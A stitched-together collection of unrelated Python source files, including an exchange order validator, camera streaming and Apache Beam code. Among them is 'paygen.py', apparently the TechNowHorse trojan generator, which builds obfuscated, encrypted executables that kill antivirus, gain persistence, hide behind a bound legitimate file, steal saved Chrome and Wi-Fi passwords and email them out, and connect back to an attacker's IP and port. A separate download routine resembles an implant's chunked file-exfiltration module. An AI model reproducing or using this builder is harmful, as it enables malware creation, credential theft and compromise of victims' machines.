# Parse message if it's not a connection.
client_id = msg["id"]
content = Util.unpackage(msg["header"], msg["body"])
# Validate order fields according to the OUCH protocol.
valid, outbound = self._validate_order_syntax(content, client_id)
msg_type = content["message_type"]
cancel_repl_reason = None
if not valid:
# If a replacement order is not valid, cancel the order.
if msg_type == 'U':
# Section 6.3
msg_type == "X"
content = {
"message_type": "X",
"order_token": content["existing_order_token"],
"quantity": content["quantity"]
}
valid = True
cancel_repl_reason = outbound[0] # Remember order cancelled reason
# Pass valid order into the orderbook
if valid:
self.orderbook_lock.acquire()
success, outbound = self.orderbook.handle_order(client_id, content)
self.orderbook_lock.release()
if len(outbound) == 0:
self.print_dict.set()
continue
# Send outbound message back to client.
if cancel_repl_reason != None:
if len(outbound) != 5:
raise ValueError("Expected cancel message but was not the same length.")
else:
outbound[4] = cancel_repl_reason
self.connection_manager.send_message(client_id, Util.package(outbound))
if self.debug == "debug":
self.print_dict.set()
def _validate_order_syntax(self, content: dict, client_id: int): # -> (bool, list):
"""
Validates the formatting of the order from a specfic client.
:param content: Decoded and parsed messaged sent by the client.
:param client_id: Unique Integer ID assigned to each client by the receiver.
:returns: boolean of whether the order is allowed or not.
"""
msg_type = content["message_type"]
err_code = None
outbound = []
if msg_type == 'O':
# Checking Error rejected reasons in Table 3 Section 7.7.
# Not Implemented: H, V, i, R, F, L, C, O
if content["orderbook_id"] > 3 or content["orderbook_id"] < 0:
err_code = "S"
elif content["price"] > self.PRICE_MAX:
err_code = "X"
elif content["quantity"] > self.QUANTITY_MAX or content["quantity"] <= 0:
err_code = "Z"
elif content["minimum_quantity"] > 0 and content["time_in_force"] != 0:
err_code = "N"
elif content["buy_sell_indicator"] not in ("B", "S", "T", "E") or \
content["order_classification"] not in ("1", "3", "4", "5", "6") or \
content["time_in_force"] not in (0, 99999):
err_code = "Y"
elif content["display"] not in ("P", " "):
err_code = "D"
elif content["cash_margin_type"] not in ("1", "2", "3", "4", "5"):
err_code = "G"
else:
return True, outbound
outbound = ["J", Util.get_server_time(), content["order_token"], err_code]
return False, outbound
elif msg_type == 'U':
if content["price"] > self.PRICE_MAX:
err_code = "X"
elif content["quantity"] > self.QUANTITY_MAX:
err_code = "Z"
elif content["minimum_quantity"] > 0 and content["time_in_force"] != 0:
err_code = "N"
elif content["time_in_force"] not in (0, 99999):
err_code = "Y"
elif content["display"] not in ("P", " "):
err_code = "D"
else:
return True, outbound
outbound = [err_code]
return False, outbound
elif msg_type == 'X':
return True, outbound
else:
raise ValueError(f"Invalid header detected in Exchange validation.")
def _handle_signal(self):
"""Handler which dumps the orderbook into a csv file when SIGUSR1 or SIGILL is caught in silent mode."""
# implement with sigill in windows and sigusr1 in linux
# use sys.platform to check operating system
pass
def _print_orderbook_thread(self):
"""Threading wrapper for print_orderbook which outputs once every second."""
while True:
time.sleep(1)
if self.debug == "debug":
self._print_orderbook_debug()
elif self.debug == "none":
pass
elif self.debug == "default":
self._print_orderbook()
else:
raise Exception(f"Output mode {self.debug} not defined.")
def _print_orderbook(self):
"""Prints the Orderbook to the console in a nice format."""
if self.debug == "none":
raise Exception("Normal printing when should be debugging")
self.orderbook_lock.acquire()
Console(loadfrom=self.orderbook.get_book()).print()
self.connection_manager.print_connections()
self.orderbook_lock.release()
def _print_orderbook_debug(self):
"""Prints the Orderbook to the console in a nice format."""
if not self.debug == "debug":
raise Exception("Debug printing when not in debugging mode")
self.print_dict.clear()
self.orderbook_lock.acquire()
Console(loadfrom=self.orderbook.get_book()).print()
self.connection_manager.print_connections()
self.orderbook.debug()
self.connection_manager.print_log()
self.orderbook_lock.release()
self.print_dict.wait() |
paygen.py | #!/usr/bin/env python3
import encrypt_code
import os
import argparse
import subprocess
import shutil
import banners
import platform
from essential_generators import DocumentGenerator
BLUE, RED, WHITE, YELLOW, MAGENTA, GREEN, END = '\33[94m', '\033[91m', '\33[97m', '\33[93m', '\033[1;35m', '\033[1;32m', '\033[0m'
if platform.system() == 'Windows':
PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")
Attacker_System = 'Windows'
elif platform.system() == 'Linux':
Attacker_System = 'Linux'
PYTHON_PYINSTALLER_PATH = "wine ~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe"
def get_options():
parser = argparse.ArgumentParser(description=f'{RED}TechnowHorse v1.6')
parser._optionals.title = f"{GREEN}Optional Arguments{YELLOW}"
parser.add_argument("-w", "--windows", dest="windows", help="Generate a Windows executable.", action='store_true')
parser.add_argument("-l", "--linux", dest="linux", help="Generate a Linux executable.", action='store_true')
parser.add_argument("-t", "--persistence", dest="time_persistent", help="Becoming Persistence After __ seconds. default=10", default=10)
parser.add_argument("-b", "--bind", dest="bind", help="AutoBinder : Specify Path of Legitimate file.")
parser.add_argument("-k", "--kill_av", dest="kill_av", help="AntivirusKiller : Specify AV's .exe which need to be killed. Ex:- --kill_av cmd.exe")
parser.add_argument("-s", "--steal-password", dest="stealer", help=f"Steal Saved Password from Victim Machine [{RED}Supported OS : Windows{YELLOW}]", action='store_true')
required_arguments = parser.add_argument_group(f'{RED}Required Arguments{GREEN}')
required_arguments.add_argument("--icon", dest="icon", help="Specify Icon Path, Icon of Evil File [Note : Must Be .ico].")
required_arguments.add_argument("--ip", dest="ip", help="Email address to send reports to.")
required_arguments.add_argument("--port", dest="port", help="Port of the IP Address given in the --ip argument.")
required_arguments.add_argument("-e", "--email", dest="email", help="Email address to send \'TrojanHorse Started\' Notification with other Juicy Info.")
required_arguments.add_argument("-p", "--password", dest="password", help="Password for the email address given in the -e argument.")
required_arguments.add_argument("-o", "--output", dest="output", help="Output file name.", required=True)
return parser.parse_args()
def get_python_pyinstaller_path():
try:
if os.name in ('ce', 'nt', 'dos'):
# If OS == Windows
python_path = subprocess.check_output("where pyinstaller.exe", shell=True)
elif 'posix' in os.name:
# If OS == Linux
python_path = subprocess.check_output("which pyinstaller.exe", shell=True)
python_path = str(python_path).split('\'')[1]
python_path = python_path.replace("\\n", "")
python_path = python_path.replace("\\r", "")
python_path = python_path.replace("\\\\", "/")
except Exception:
python_path = "UnableToFind"
return python_path
def check_dependencies():
print(f"{YELLOW}\n[*] Checking Dependencies...")
try:
import mss, essential_generators, PyInstaller, six
print(f"{GREEN}[+] All Dependencies are Installed on this system ;)\n")
except Exception as e:
print(f"[!] Error : {e}")
try:
print(f"{YELLOW}[*] Installing All Dependencies From Scratch...\n")
print(f'\n{WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
import pip
while 1:
pip.main(['install', 'mss==4.0.3'])
pip.main(['install', 'essential_generators==0.9.2'])
pip.main(['install', 'PyInstaller'])
pip.main(['install', 'six==1.12.0'])
pip.main(['install', 'python-xlib==0.25'])
print(f'\n{WHITE}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]\n')
print(f"{GREEN}\n[+] Dependencies installed correctly ;)\n")
break
except:
print(f"{RED}\n[!] Unable to Install Dependencies, Please Try Again :(\n")
quit()
def create_trojan(file_name, email, password, ip, port, time_persistent, legitimate_file=None):
with open(file_name, "w+") as file:
file.write("import payload, win32event, winerror, win32api\n")
if arguments.stealer:
file.write("import password_stealer\n")
if arguments.bind or arguments.stealer:
file.write("import threading\n\n")
if arguments.bind != None:
#Codes to Run, Legitimate File on Front End
file.write("import subprocess, sys\n\n")
file.write("def run_front_file():\n")
file.write(f"\tfile_name = sys._MEIPASS.replace('\\\\', '/') + \"/{legitimate_file}\" \n")
file.write(f"\tsubprocess.call(file_name, shell=True)\n\n")
#Running Front End File on Different Thread
file.write("t1 = threading.Thread(target=run_front_file)\n")
file.write("t1.start()\n\n")
#Below Codes will check for already running instance,
file.write("\nmutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')\n\n")
if arguments.stealer:
#Saved Password Stealer
file.write("def steal():\n")
file.write(f"\tsteal = password_stealer.SendPass(\'{email}\', \'{password}\')\n")
file.write(f"\tsteal.get_wifi_creds()\n")
file.write(f"\tprint(\"[+] Wifi Password Send Successfully!\")\n")
file.write(f"\tsteal.get_chrome_browser_creds()\n")
file.write(f"\tprint(\"[+] Chrome Browser Password Send Successfully!\")\n\n")
file.write("def check_and_start():\n")
file.write("\tif win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:\n")
file.write("\t\tmutex = None\n")
file.write("\t\tprint(\"[+] Disabling TechNowHorse: Already Running\")\n")
file.write("\telse:\n") # if no instance running, going to run TechNowHorse
if arguments.stealer:
file.write(f"\t\tt2 = threading.Thread(target=steal)\n") #Making Stealer Thread
file.write(f"\t\tt2.start()\n\n") #Starting Thread
file.write(f"\t\ttechnowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
if arguments.kill_av != None and arguments.kill_av != "":
file.write(f"\t\ttechnowHorse.kill_av({arguments.kill_av})\n")
else:
file.write("\t\ttechnowHorse.kill_av()\n")
file.write(f"\t\ttechnowHorse.become_persistent({time_persistent})\n")
file.write("\t\ttechnowHorse.start()\n\n")
file.write("check_and_start()\n")
def create_trojan_linux(file_name, email, password, ip, port, time_persistent):
with open(file_name, "w+") as file:
file.write("import payload\n")
file.write(f"technowHorse = payload.TrojanHorse(\'{email}\', \'{password}\', \'{ip}\', {port})\n")
file.write(f"technowHorse.become_persistent({time_persistent})\n")
file.write("technowHorse.start()\n\n")
def obfuscating_payload(file_name):
gen = DocumentGenerator()
text = "#" + gen.sentence()
with open(file_name, "a") as file:
file.write(text)
def compile_for_windows(file_name):
if arguments.bind != None and arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.bind != None:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon} --add-data \"{arguments.bind};.\"", shell=True)
elif arguments.stealer:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload --hidden-import=password_stealer {file_name} -i {arguments.icon}", shell=True)
else:
subprocess.call(f"{PYTHON_PYINSTALLER_PATH} --onefile --noconsole --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def compile_for_linux(file_name):
subprocess.call(f"pyinstaller --onefile --noconsole --hidden-import=payload {file_name} -i {arguments.icon}", shell=True)
def del_junk_file(file_name):
try:
if platform.system() == 'Windows':
build = os.getcwd() + "\\build"
file_name = os.getcwd() + f"\\{file_name}"
pycache = os.getcwd() + "\\__pycache__"
os.remove(file_name)
os.remove(file_name + ".spec")
shutil.rmtree(build)
shutil.rmtree(pycache)
if platform.system() == 'Linux':
file_spec = file_name + ".spec"
os.system(f"rm -r build/ __pycache__/ {file_spec} {file_name}")
except Exception:
pass
def exit_greet():
try:
os.system('cls')
except Exception as e:
os.system('clear')
del_junk_file(arguments.output)
print(GREEN + '''Thank You for using TechNowHorse, Think Great & Touch The Sky! \n''' + END)
quit()
if __name__ == '__main__':
if Attacker_System == 'Windows':
try:
shutil.rmtree(os.getcwd() + "\\dist")
except Exception:
pass
else:
try:
os.system('rm -Rf dist')
except Exception:
pass
try:
print(banners.get_banner())
print(f"\t\t{YELLOW}Author: {GREEN}Pushpender | {YELLOW}GitHub: {GREEN}@Technowlogy-Pushpender\n")
arguments = get_options()
if arguments.icon == None:
arguments.icon = input(f'{RED}[!] Please Specify Icon Path {WHITE}[{GREEN}LEAVE BLANK to SET icon/exe.ico as icon{WHITE}] : ')
if arguments.icon == "":
arguments.icon = "icon/exe.ico"
if not os.path.exists(PYTHON_PYINSTALLER_PATH.replace("wine ", "")) and arguments.windows:
PYTHON_PYINSTALLER_PATH = get_python_pyinstaller_path()
if PYTHON_PYINSTALLER_PATH == "UnableToFind":
print(f'{RED}[!] Default Pyinstaller Path inside Wine Directory is Incorrect')
print(f'{RED}[!] {WHITE}[Please Update Line 19 Later] [{RED}DefautPath: {WHITE}~/.wine/drive_c/Python37-32/Scripts/pyinstaller.exe]')
PYTHON_PYINSTALLER_PATH = "wine "
PYTHON_PYINSTALLER_PATH += input(f'\n{WHITE}[?] Enter pyinstaller.exe path manually : ')
print(f'\n{GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]{GREEN}')
print(f'\n {YELLOW}Email:{RED} ' + arguments.email)
print(f' {YELLOW}Password:{RED} ' + arguments.password)
print(f' {YELLOW}IP Address:{RED} ' + arguments.ip)
print(f' {YELLOW}Port:{RED} ' + arguments.port)
print(f' {YELLOW}Output Evil File Name:{RED} ' + arguments.output)
print(f' {YELLOW}Becoming Persistence After:{RED} ' + str(arguments.time_persistent) + f'{YELLOW} seconds')
print(f' {YELLOW}Icon Path:{RED} ' + arguments.icon)
if arguments.bind != None:
print(f' {YELLOW}Binding To [{RED}Legitimate File Path{YELLOW}]:{RED} ' + str(arguments.bind))
print(f'\n{GREEN}[ * * * * * * * * * * * * * * * * * * * * * * * * * ]')
ask = input(f'\n{WHITE}[?] These info above are correct? (y/n) : ')
if ask.lower() == 'y':
pass
else:
arguments.email = input('\n[?] Type your gmail to receive logs: ')
arguments.password = input('[?] Type your gmail password: ')
arguments.ip = input('[?] LHOST or IP Address: ')
arguments.port = int(input('[?] LPORT: '))
arguments.time_persistent = int(input('[?] Time After which it should become persistence; [In Seconds]: '))
arguments.output = input('[?] Output Evil File Name: ')
arguments.icon = input(f'[?] Icon Path [{RED}If Present In This Directory, then just type Name{WHITE}]: ')
if arguments.bind != None:
arguments.bind = input(f'[?] Path of Legitimate File [{RED}.exe is Recommended{WHITE}]: ')
check_dependencies()
print(f"\n{YELLOW}[*] Generating Please wait for a while...{MAGENTA}\n")
if Attacker_System == 'Linux':
if arguments.linux:
create_trojan_linux(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent)
if Attacker_System == 'Windows' and arguments.linux:
print(f"{RED}[!] Linux payload can't be compiled from windows machine")
print(f"{YELLOW}[*] Making Payload for Windows ...\n")
if arguments.windows:
create_trojan(arguments.output, arguments.email, arguments.password, arguments.ip, arguments.port, arguments.time_persistent, arguments.bind)
obfuscating_payload(arguments.output)
encrypting_code = encrypt_code.Encrypt()
encrypting_code.encrypt(arguments.output)
print(f"{YELLOW}[*] Compiling your payload, Please Wait for a while...")
print(f"{MAGENTA}")
if arguments.windows:
compile_for_windows(arguments.output)
elif arguments.linux:
compile_for_linux(arguments.output)
else:
print(f"{RED}[!] Please Specify {YELLOW}-w{RED} for {GREEN}WINDOWS{RED} or {YELLOW}-l{RED} for {GREEN}LINUX{RED} payload generation")
print(f"\n{YELLOW}[*] Deleting Junk Files...")
del_junk_file(arguments.output)
print(f"{GREEN}[+] Junk Files Removed Successfully!")
if os.path.exists(f'dist/{arguments.output}.exe') or os.path.exists(f'dist/{arguments.output}'):
print(f"\n{GREEN}[+] Generated Successfully!\n")
print(f"\n\n{RED}[***] Don't forget to allow less secure applications in your Gmail account.")
print(f"{GREEN}Use the following link to do so https://myaccount.google.com/lesssecureapps")
print(f"\n{RED} :O-) TIP{YELLOW} : USE ICONS from {RED}icon{YELLOW} folder like this >> {RED}--icon icon/exe.ico")
else:
print(f"\n{RED}[!] Failed To Generate Your Payload :(, Please Try Again!\n")
print(f"\n{GREEN}[:D] Please Contact us on https://github.com/Technowlogy-Pushpender/technowhorse\n")
except KeyboardInterrupt:
exit_greet()
|
26'sPick Up.py | import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26's Pick Up",
"description": "dl: set&off&stack&pick ",
"version": "0.1.1",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "MoveObject"
KASAR = "PassCarryItem"
HIYAR = "SetCustomStackingHeight"
kod = ""
kod2 = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod, sec_player
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod2)+'}{i:1}{i:11}{i:0}')
sleep(0.3)
text = msj.packet.read_string()
if text == ':dl stack':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Select and move the furniture you want to stack, then type :dl set"}{i:0}{i:30}{i:0}{i:0}')
if text == ':dl pick':
msj.is_blocked = True
sec_player = True
ext.send_to_client('{in:Chat}{i:123456789}{s:""double click on the furniture you want to remove}{i:0}{i:30}{i:0}{i:0}')
if text == ':dl set':
msj.is_blocked = True
sc = True
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}{i:1}{i:11}{i:0}')
ext.send_to_server('{out:SetCustomStackingHeight}{i:'+str(kod)+'}{i:3500}')
ext.send_to_client('{in:Chat}{i:123456789}{s:"Stack setting "}{i:0}{i:30}{i:0}{i:0}')
thread = threading.Thread(target=main)
thread.start()
if text == ':dl off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
sec_player = False
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
mobi_id, _, _, _, _ = p.packet.read("iiiii")
kod = str(mobi_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
sec_kod = False
def yukle_kod2(p):
global kod2, sec_player
if sec_player:
player_id, _, _ = p.packet.read("iii")
kod2 = str(player_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"Pick up '+str(kod2)+' "}{i:0}{i:30}{i:0}{i:0}')
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'MoveObject')
ext.intercept(Direction.TO_SERVER, yukle_kod2, 'UseFurniture') |
fake_learner.py | # -*- coding: utf-8 -*-
"""
File name : learner
Date : 14/05/2019
Description : {TODO}
Author : VickeeX
"""
from zmq_serialize import SerializingContext
import multiprocessing as mp, zmq
class FakeLearner:
def __init__(self):
self.shared = []
self.queue = mp.Queue(maxsize=10240)
def zmq_server_run(self):
ctx = SerializingContext()
rep = ctx.socket(zmq.REP)
rep.bind("tcp://127.0.0.1:6666")
# while True:
for i in range(6):
data = rep.recv_zipped_pickle()
self.put_batch(data)
print("Checking zipped pickle...")
# print("Okay" if (shared_rewards[2] == B[2][3]).all() else "Failed")
rep.send_string("received data.")
print("ok.")
def put_batch(self, data):
self.queue.put(data)
print("put ok")
# print(self.queue.qsize())
def get_batch(self):
return self.queue.get()
def train(self):
""" train"""
mp.Process(target=self.zmq_server_run).start()
for i in range(6):
dt = self.get_batch()
print(dt.__sizeof__())
print("get batch", i, "ok")
# print(len(data), data[0][1].shape, data[0][2].shape, data[0][3].shape)
# print("ok" if data[0][3] == np.ones(shape=(32,), dtype=np.float32) else "data wrong")
|
streaming.py | import sys
import os
from time import sleep
import grpc
import camera_pb2
import camera_pb2_grpc
import threading
import logging
from concurrent import futures
import queue
import traceback
from flask import Flask, render_template, Response
from kubernetes import client, config
import re
camera_frame_queues = []
small_frame_sources = []
def get_camera_list(configuration_name):
camera_list = []
config.load_incluster_config()
coreV1Api = client.CoreV1Api()
ret = coreV1Api.list_service_for_all_namespaces(watch=False)
p = re.compile(configuration_name + "-[\da-f]{6}-svc")
for svc in ret.items:
if not p.match(svc.metadata.name):
continue
grpc_ports = list(filter(lambda port: port.name == "grpc", svc.spec.ports))
if (len(grpc_ports) == 1):
url = "{0}:{1}".format(svc.spec.cluster_ip, grpc_ports[0].port)
camera_list.append(url)
camera_list.sort()
return camera_list
app = Flask(__name__)
@app.route('/')
# Home page for video streaming.
def index():
global camera_frame_queues
return render_template('index.html', camera_count=len(camera_frame_queues)-1)
@app.route('/camera_list')
# Returns the current list of cameras to allow for refresh
def camera_list():
global small_frame_sources
return ",".join(small_frame_sources)
# Generator function for video streaming.
def gen(frame_queue, verbose=False):
while True:
frame = frame_queue.get(True, None)
yield (b'--frame\r\n'
b'Content-Type: image/jpeg\r\n\r\n' + frame + b'\r\n')
# Gets response and puts it in frame queue.
def response_wrapper(frame_queue):
return Response(gen(frame_queue),
mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/camera_frame_feed/<camera_id>')
# Gets frame feed for specified camera.
def camera_frame_feed(camera_id=0):
global camera_frame_queues
camera_id = int(camera_id)
if (camera_id <= len(camera_frame_queues)):
logging.info("camera_feed %d" % camera_id)
return response_wrapper(camera_frame_queues[camera_id])
return None
# Updates set of cameras based on set of camera instance services
def refresh_cameras(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event):
while True:
sleep(1)
camera_list = get_camera_list(os.environ['CONFIGURATION_NAME'])
if camera_list != small_frame_sources:
old_count = len(small_frame_sources)
new_count = len(camera_list)
logging.info("Camera change detected, old: %d, new: %d" % (old_count, new_count))
if old_count != new_count:
if old_count < new_count:
for x in range(new_count - old_count):
camera_frame_queues.append(queue.Queue(1))
small_frame_sources[:] = camera_list
else:
small_frame_sources[:] = camera_list
camera_frame_queues[:] = camera_frame_queues[:(old_count - new_count)]
else:
small_frame_sources[:] = camera_list
logging.info(small_frame_sources)
schedule_get_frames(
camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event)
def run_webserver():
app.run(host='0.0.0.0', threaded=True)
# Loops, creating gRPC client and grabing frame from camera serving specified url.
def get_frames(url, frame_queue, stop_event):
logging.info("Starting get_frames(%s)" % url)
while not stop_event.wait(0.01):
try:
client_channel = grpc.insecure_channel(url, options=(
('grpc.use_local_subchannel_pool', 1),))
camera_stub = camera_pb2_grpc.CameraStub(client_channel)
frame = camera_stub.GetFrame(camera_pb2.NotifyRequest())
frame = frame.frame
client_channel.close()
frame_received = False
# prevent stale data
if (len(frame) > 0):
if (frame_queue.full()):
try:
frame_queue.get(False)
except:
pass
frame_queue.put(frame, False)
frame_received = True
if (frame_received):
sleep(1)
except:
logging.info("[%s] Exception %s" % (url, traceback.format_exc()))
sleep(1)
# schedules frame polling threads
def schedule_get_frames(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event):
if camera_frame_threads:
stop_event.set()
for camera_frame_thread in camera_frame_threads:
camera_frame_thread.join()
stop_event.clear()
camera_frame_threads.clear()
cameras_frame_thread = threading.Thread(target=get_frames, args=(main_frame_source, camera_frame_queues[0], stop_event))
cameras_frame_thread.start()
camera_frame_threads.append(cameras_frame_thread)
for camera_id in range(1, len(small_frame_sources) + 1):
camera_frame_thread = threading.Thread(target=get_frames, args=(small_frame_sources[camera_id - 1], camera_frame_queues[camera_id], stop_event))
camera_frame_thread.start()
camera_frame_threads.append(camera_frame_thread)
print("Starting...", flush=True)
logging.basicConfig(format="%(asctime)s: %(message)s", level=logging.INFO, datefmt="%H:%M:%S")
main_frame_source = ""
if 'CONFIGURATION_NAME' in os.environ:
# Expecting source service ports to be named grpc
configuration_name = os.environ['CONFIGURATION_NAME']
config.load_incluster_config()
coreV1Api = client.CoreV1Api()
ret = coreV1Api.list_service_for_all_namespaces(watch=False)
for svc in ret.items:
if svc.metadata.name == configuration_name + "-svc":
grpc_ports = list(
filter(lambda port: port.name == "grpc", svc.spec.ports))
if (len(grpc_ports) == 1):
main_frame_source = "{0}:{1}".format(
svc.spec.cluster_ip, grpc_ports[0].port)
small_frame_sources = get_camera_list(configuration_name)
camera_count = len(small_frame_sources)
else:
camera_count = int(os.environ['CAMERA_COUNT'])
main_frame_source = "{0}:80".format(os.environ['CAMERAS_SOURCE_SVC'])
for camera_id in range(1, camera_count + 1):
url = "{0}:80".format(
os.environ['CAMERA{0}_SOURCE_SVC'.format(camera_id)])
small_frame_sources.append(url)
for camera_id in range(camera_count + 1):
camera_frame_queues.append(queue.Queue(1))
webserver_thread = threading.Thread(target=run_webserver)
webserver_thread.start()
stop_event = threading.Event()
camera_frame_threads = []
schedule_get_frames(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event)
if 'CONFIGURATION_NAME' in os.environ:
refresh_thread = threading.Thread(target=refresh_cameras, args=(camera_frame_threads, small_frame_sources, camera_frame_queues, stop_event))
refresh_thread.start()
print("Started", flush=True)
webserver_thread.join()
print("Done", flush=True)
|
download.py | def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
while i != chunks +1:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
f = open(fullpath, 'r')
f.seek((i-1)*chunkSize)
blob = f.read(chunkSize)
chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i +=1
print("\t- Download Done")
exit()
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start() |
portable_runner.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# pytype: skip-file
from __future__ import absolute_import
import functools
import itertools
import logging
import threading
import time
from typing import TYPE_CHECKING
from typing import Any
from typing import Iterator
from typing import Optional
from typing import Tuple
import grpc
from apache_beam.metrics import metric
from apache_beam.metrics.execution import MetricResult
from apache_beam.options.pipeline_options import DebugOptions
from apache_beam.options.pipeline_options import PortableOptions
from apache_beam.options.pipeline_options import SetupOptions
from apache_beam.options.pipeline_options import StandardOptions
from apache_beam.portability import common_urns
from apache_beam.portability.api import beam_job_api_pb2
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.runners import runner
from apache_beam.runners.job import utils as job_utils
from apache_beam.runners.portability import job_server
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability import portable_stager
from apache_beam.runners.portability.fn_api_runner.fn_runner import translations
from apache_beam.runners.worker import sdk_worker_main
from apache_beam.runners.worker import worker_pool_main
from apache_beam.transforms import environments
if TYPE_CHECKING:
from google.protobuf import struct_pb2 # pylint: disable=ungrouped-imports
from apache_beam.options.pipeline_options import PipelineOptions
from apache_beam.pipeline import Pipeline
__all__ = ['PortableRunner']
MESSAGE_LOG_LEVELS = {
beam_job_api_pb2.JobMessage.MESSAGE_IMPORTANCE_UNSPECIFIED: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DEBUG: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_DETAILED: logging.DEBUG,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_BASIC: logging.INFO,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_WARNING: logging.WARNING,
beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR: logging.ERROR,
}
TERMINAL_STATES = [
beam_job_api_pb2.JobState.DONE,
beam_job_api_pb2.JobState.DRAINED,
beam_job_api_pb2.JobState.FAILED,
beam_job_api_pb2.JobState.CANCELLED,
]
ENV_TYPE_ALIASES = {'LOOPBACK': 'EXTERNAL'}
_LOGGER = logging.getLogger(__name__)
class JobServiceHandle(object):
"""
Encapsulates the interactions necessary to submit a pipeline to a job service.
The base set of interactions consists of 3 steps:
- prepare
- stage
- run
"""
def __init__(self, job_service, options, retain_unknown_options=False):
self.job_service = job_service
self.options = options
self.timeout = options.view_as(PortableOptions).job_server_timeout
self._retain_unknown_options = retain_unknown_options
def submit(self, proto_pipeline):
# type: (beam_runner_api_pb2.Pipeline) -> Tuple[str, Iterator[beam_job_api_pb2.JobStateEvent], Iterator[beam_job_api_pb2.JobMessagesResponse]]
"""
Submit and run the pipeline defined by `proto_pipeline`.
"""
prepare_response = self.prepare(proto_pipeline)
retrieval_token = self.stage(
proto_pipeline,
prepare_response.artifact_staging_endpoint.url,
prepare_response.staging_session_token)
return self.run(prepare_response.preparation_id, retrieval_token)
def get_pipeline_options(self):
# type: () -> struct_pb2.Struct
"""
Get `self.options` as a protobuf Struct
"""
# fetch runner options from job service
# retries in case the channel is not ready
def send_options_request(max_retries=5):
num_retries = 0
while True:
try:
# This reports channel is READY but connections may fail
# Seems to be only an issue on Mac with port forwardings
return self.job_service.DescribePipelineOptions(
beam_job_api_pb2.DescribePipelineOptionsRequest(),
timeout=self.timeout)
except grpc.FutureTimeoutError:
# no retry for timeout errors
raise
except grpc._channel._Rendezvous as e:
num_retries += 1
if num_retries > max_retries:
raise e
time.sleep(1)
